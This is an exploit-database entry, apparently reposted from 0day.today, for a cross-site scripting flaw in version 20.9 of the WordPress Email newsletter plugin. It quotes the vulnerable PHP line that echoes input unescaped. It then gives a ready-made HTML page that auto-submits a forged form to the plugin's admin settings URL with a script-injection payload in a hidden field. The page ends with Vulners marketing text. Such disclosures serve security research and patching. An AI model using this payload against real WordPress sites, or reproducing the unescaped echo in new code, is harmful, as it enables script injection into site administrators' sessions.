######################
# Exploit Title : Wordpress Email newsletter 20.9 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/email-newsletter/
# Software Link : https://downloads.wordpress.org/plugin/email-newsletter.20.9.zip
# Date : 2015-01-03
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://127.0.0.1/wordpress/wp-admin/admin.php?page=email-setting
######################
# Vulnerable code :
<input name="eemail_from_name" id="eemail_from_name" type="text"
value="<?php echo $eemail_from_name; ?>" maxlength="150" size="50" />
#####################
Exploit Code:
<html>
<body>
<form name="eemail_form" method="post"
action="http://localhost/wordpress/wp-admin/admin.php?page=email-setting" onsubmit="return
_email_setting()" >
<input name="eemail_from_email" id="eemail_from_email" type="hidden"
value='"><script>alert(1)</script>' maxlength="150" size="50" />
<script language="Javascript">
setTimeout('eemail_form.submit()', 1);
</script>
</body>
</html>
# 0day.today [2018-02-18] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation